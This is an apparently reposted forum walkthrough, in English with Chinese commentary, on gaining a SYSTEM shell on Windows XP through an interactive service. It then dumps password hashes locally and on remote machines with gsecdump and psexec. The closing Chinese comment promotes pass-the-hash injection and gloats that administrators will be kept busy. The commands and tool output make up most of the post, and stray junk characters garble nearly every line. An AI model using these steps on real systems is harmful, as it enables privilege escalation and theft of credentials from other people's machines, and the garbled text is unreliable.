o get a DOS Prompt as NT system:
4 t" K8 z* y$ C* X# E8 U, w6 e9 ^; [4 K+ Z/ N
C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
* g. Y8 M/ U; {, u0 s[SC] CreateService SUCCESS
4 M' m8 _# L0 o6 V/ _" E2 m
! n( J* O- w9 q0 ?C:\>sc start shellcmdline
+ K' B. L6 b7 V9 N[SC] StartService FAILED 1053:
+ K2 F4 p7 k/ X2 v/ T+ G5 s3 o1 M2 |! k7 U1 S2 q& Q
The service did not respond to the start or control request in a timely fashion.
% d$ N/ d5 c" f! ~! m) x i9 E
; m+ z# }6 [. j" `; uC:\>sc delete shellcmdline4 q; {: g, f, B4 W" |; O
[SC] DeleteService SUCCESS1 x" g7 l. |7 Z: |% X
5 t9 O) ~# x# u+ [2 ^$ ]------------* F8 v: S! F0 m8 |; k" R, @
+ }1 ~% T$ z0 \3 l
Then in the new DOS window:
8 y) b! P% n* b z9 B0 D; B9 l; r0 U% Z# a& m" e% a# {/ ^
Microsoft Windows XP [Version 5.1.2600]
. R' O' w7 v$ W+ i. C2 w(C) Copyright 1985-2001 Microsoft Corp.
4 N3 m1 _: w. v( l& ^
7 c; |0 l+ j7 H" F& ?0 b" dC:\WINDOWS\system32>whoami
- {) O5 M0 m0 ~4 ANT AUTHORITY\SYSTEM
9 f1 T, w2 `( G1 ]" y7 B3 V0 b# G2 ?0 }( t5 }
C:\WINDOWS\system32>gsecdump -h- ^2 P4 h" A; }0 W: y5 x/ `9 F1 f& E
gsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)
; q5 b. O) e+ x: C, ~. L, O1 Musage: gsecdump [options]
4 N0 E$ b1 m. h# e. g$ }: n. e) g X
9 K$ Y( Y/ {& B" B# D( }. uoptions:+ _0 \& u+ Z# }" T% B
-h [ --help ] show help, A6 {/ C9 [" q( U3 b
-a [ --dump_all ] dump all secrets
) `5 n3 I) B' P- R+ {8 a-l [ --dump_lsa ] dump lsa secrets$ f3 l D9 _( E; D
-w [ --dump_wireless ] dump microsoft wireless connections7 B! v4 Z! W; F5 e/ a
-u [ --dump_usedhashes ] dump hashes from active logon sessions6 q4 W+ {" u% [$ ~3 l6 M
-s [ --dump_hashes ] dump hashes from SAM/AD' Y$ E; ?( T* {" ?- t
7 r# t+ T+ B" a* c+ Z7 jAlthough I like to use:( I* b5 o4 K7 G4 d; E2 o+ D1 i, V) x
, [' y! g! x& j) Z, c& I
PsExec v1.83 - Execute processes remotely! C6 b) s: y5 U. A S/ U
Copyright (C) 2001-2007 Mark Russinovich: ]* r* W; K1 z- i) T+ s
Sysinternals - 链接标记[url]www.sysinternals.com[/url]
( i! H9 ~" [, j. H5 A- [; k
4 ]; A2 \7 A4 @! ] J, U( ]- _' s" o6 nC:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT
' ], V- k3 }+ D/ q$ s5 W6 J
+ H1 H# t# U4 }0 ?to get the hashes from active logon sessions of a remote system.5 ^/ H1 j0 f( ?8 U
/ N' C6 Y% u* S: I) X! j2 F R
These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.
* b! S5 ?+ ^6 I& b/ N+ {2 \) J. Q# h( ~# ?2 L4 \
提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.# l6 A$ M* O2 ?; h) n( x
原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url], q: X' K1 w7 D. e; u" i4 W
7 [' Y' @9 ]5 W
我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。% P9 N/ i) Z$ J' U% } w8 P# D. @
|